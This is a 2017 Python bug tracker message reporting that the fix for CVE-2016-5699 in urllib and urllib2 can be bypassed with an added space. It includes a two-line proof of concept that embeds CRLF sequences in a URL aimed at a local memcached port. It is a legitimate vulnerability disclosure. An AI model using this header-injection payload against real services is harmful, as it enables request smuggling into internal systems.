Author orange
Recipients orange
Date 2017-05-24.15:01:31
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1495638091.75.0.96439752743.issue30458@psf.upfronthosting.co.za>
In-reply-to
Content
Hi, the patch in CVE-2016-5699 can be broke by an addition space.
http://www.cvedetails.com/cve/CVE-2016-5699/
https://hg.python.org/cpython/rev/bf3e1c9b80e9
https://hg.python.org/cpython/rev/1c45047c5102

import urllib, urllib2

urllib.urlopen('http://127.0.0.1\r\n\x20hihi\r\n :11211')
urllib2.urlopen('http://127.0.0.1\r\n\x20hihi\r\n :11211')
History
Date User Action Args
2017-05-24 15:01:31orangesetrecipients: + orange
2017-05-24 15:01:31orangesetmessageid: <1495638091.75.0.96439752743.issue30458@psf.upfronthosting.co.za>
2017-05-24 15:01:31orangelinkissue30458 messages
2017-05-24 15:01:31orangecreate